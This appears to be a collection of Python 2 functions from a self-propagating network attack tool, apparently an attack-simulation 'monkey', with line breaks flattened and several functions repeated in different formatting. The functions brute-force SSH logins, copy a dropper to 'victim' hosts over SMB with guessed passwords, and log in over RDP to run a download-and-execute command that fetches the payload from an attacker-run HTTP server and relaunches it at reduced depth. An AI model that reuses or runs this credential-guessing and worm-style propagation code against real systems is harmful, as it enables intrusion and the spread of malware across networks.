def exploit_host(self, host, depth=-1, src_path=None): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) port = SSH_PORT # if ssh banner found on different port, use that port. for servkey, servdata in host.services.items(): if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): port = int(servkey.replace('tcp-', '')) is_open, _ = check_port_tcp(host.ip_addr, port) if not is_open: LOG.info("SSH port is closed on %r, skipping", host) return False passwords = list(self._config.ssh_passwords[:]) users = list(self._config.ssh_users) known_passwords = [host.get_credentials(x) for x in users] if len(known_passwords) > 0: for known_pass in known_passwords: if known_pass in passwords: passwords.remove(known_pass) passwords.insert(0, known_pass) #try first user_pass = product(users, passwords) exploited = False for user, curpass in user_pass: try: ssh.connect(host.ip_addr, username=user, password=curpass, port=port, timeout=None) LOG.debug("Successfully logged in %r using SSH (%s : %s)", host, user, curpass) host.learn_credentials(user, curpass) exploited = True break except Exception, exc: LOG.debug( "Error logging into victim %r with user" " %s and password '%s': (%s)", host, user, curpass, exc) report_failed_login(self, host, user, curpass) continue
def exploit_host(self, host, depth=-1, src_path=None): assert isinstance(host, VictimHost) src_path = src_path or get_target_monkey(host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", host) return False passwords = list(self._config.psexec_passwords[:]) known_password = host.get_credentials(self._config.psexec_user) if known_password is not None: if known_password in passwords: passwords.remove(known_password) passwords.insert(0, known_password) exploited = False for password in passwords: try: # copy the file remotely using SMB remote_full_path = SmbTools.copy_file( host, self._config.psexec_user, password, src_path, self._config.dropper_target_path, self._config.smb_download_timeout) if remote_full_path is not None: LOG.debug("Successfully logged in %r using SMB (%s : %s)", host, self._config.psexec_user, password) host.learn_credentials(self._config.psexec_user, password) exploited = True break else: # failed exploiting with this user/pass report_failed_login(self, host, self._config.psexec_user, password) except Exception, exc: LOG.debug( "Exception when trying to copy file using SMB to %r with user" " %s and password '%s': (%s)", host, self._config.psexec_user, password, exc) continue
def exploit_host(self, host, depth=-1, src_path=None): assert isinstance(host, VictimHost) src_path = src_path or get_target_monkey(host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", host) return False passwords = list(self._config.psexec_passwords[:]) known_password = host.get_credentials(self._config.psexec_user) if known_password is not None: if known_password in passwords: passwords.remove(known_password) passwords.insert(0, known_password) exploited = False for password in passwords: try: # copy the file remotely using SMB remote_full_path = SmbTools.copy_file(host, self._config.psexec_user, password, src_path, self._config.dropper_target_path, self._config.smb_download_timeout) if remote_full_path is not None: LOG.debug("Successfully logged in %r using SMB (%s : %s)", host, self._config.psexec_user, password) host.learn_credentials(self._config.psexec_user, password) exploited = True break else: # failed exploiting with this user/pass report_failed_login(self, host, self._config.psexec_user, password) except Exception, exc: LOG.debug("Exception when trying to copy file using SMB to %r with user" " %s and password '%s': (%s)", host, self._config.psexec_user, password, exc) continue
def exploit_host(self, host, depth=-1, src_path=None): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) port = SSH_PORT # if ssh banner found on different port, use that port. for servkey, servdata in host.services.items(): if servdata.get("name") == "ssh" and servkey.startswith("tcp-"): port = int(servkey.replace("tcp-", "")) is_open, _ = check_port_tcp(host.ip_addr, port) if not is_open: LOG.info("SSH port is closed on %r, skipping", host) return False passwords = list(self._config.ssh_passwords[:]) users = list(self._config.ssh_users) known_passwords = [host.get_credentials(x) for x in users] if len(known_passwords) > 0: for known_pass in known_passwords: if known_pass in passwords: passwords.remove(known_pass) passwords.insert(0, known_pass) # try first user_pass = product(users, passwords) exploited = False for user, curpass in user_pass: try: ssh.connect(host.ip_addr, username=user, password=curpass, port=port, timeout=None) LOG.debug("Successfully logged in %r using SSH (%s : %s)", host, user, curpass) host.learn_credentials(user, curpass) exploited = True break except Exception, exc: LOG.debug( "Error logging into victim %r with user" " %s and password '%s': (%s)", host, user, curpass, exc ) report_failed_login(self, host, user, curpass) continue
def exploit_host(self, host, depth=-1, src_path=None): global g_reactor assert isinstance(host, VictimHost) is_open, _ = check_port_tcp(host.ip_addr, RDP_PORT) if not is_open: LOG.info("RDP port is closed on %r, skipping", host) return False src_path = src_path or get_target_monkey(host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", host) return False # create server for http download. http_path, http_thread = HTTPTools.create_transfer(host, src_path) if not http_path: LOG.debug( "Exploiter RdpGrinder failed, http transfer creation failed.") return False cmdline = build_monkey_commandline(host, depth - 1) if self._config.rdp_use_vbs_download: command = RDP_CMDLINE_HTTP_VBS % { 'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline } else: command = RDP_CMDLINE_HTTP_BITS % { 'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline } passwords = list(self._config.psexec_passwords[:]) known_password = host.get_credentials(self._config.psexec_user) if known_password is not None: if known_password in passwords: passwords.remove(known_password) passwords.insert(0, known_password) if not g_reactor.is_alive(): g_reactor.daemon = True g_reactor.start() exploited = False for password in passwords: try: # run command using rdp. LOG.info( "Trying rdp logging into victim %r with user %s and password '%s'", host, self._config.psexec_user, password) client_factory = CMDClientFactory(self._config.psexec_user, password, "", command) reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory) client_factory.done_event.wait() if client_factory.success: exploited = True host.learn_credentials(self._config.psexec_user, password) break else: # failed exploiting with this user/pass report_failed_login(self, host, self._config.psexec_user, password) except Exception, exc: LOG.debug( "Error logging into victim %r with user" " %s and password '%s': (%s)", host, self._config.psexec_user, password, exc) continue
def exploit_host(self, host, depth=-1, src_path=None): global g_reactor assert isinstance(host, VictimHost) is_open, _ = check_port_tcp(host.ip_addr, RDP_PORT) if not is_open: LOG.info("RDP port is closed on %r, skipping", host) return False src_path = src_path or get_target_monkey(host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", host) return False # create server for http download. http_path, http_thread = HTTPTools.create_transfer(host, src_path) if not http_path: LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.") return False LOG.info("Started http server on %s", http_path) cmdline = build_monkey_commandline(host, depth-1) if self._config.rdp_use_vbs_download: command = RDP_CMDLINE_HTTP_VBS % { 'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline} else: command = RDP_CMDLINE_HTTP_BITS % { 'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline} passwords = list(self._config.psexec_passwords[:]) known_password = host.get_credentials(self._config.psexec_user) if known_password is not None: if known_password in passwords: passwords.remove(known_password) passwords.insert(0, known_password) if not g_reactor.is_alive(): g_reactor.daemon = True g_reactor.start() exploited = False for password in passwords: try: # run command using rdp. LOG.info("Trying RDP logging into victim %r with user %s and password '%s'", host, self._config.psexec_user, password) LOG.info("RDP connected to %r", host) client_factory = CMDClientFactory(self._config.psexec_user, password, "", command) reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory) client_factory.done_event.wait() if client_factory.success: exploited = True host.learn_credentials(self._config.psexec_user, password) break else: # failed exploiting with this user/pass report_failed_login(self, host, self._config.psexec_user, password) except Exception, exc: LOG.debug("Error logging into victim %r with user" " %s and password '%s': (%s)", host, self._config.psexec_user, password, exc) continue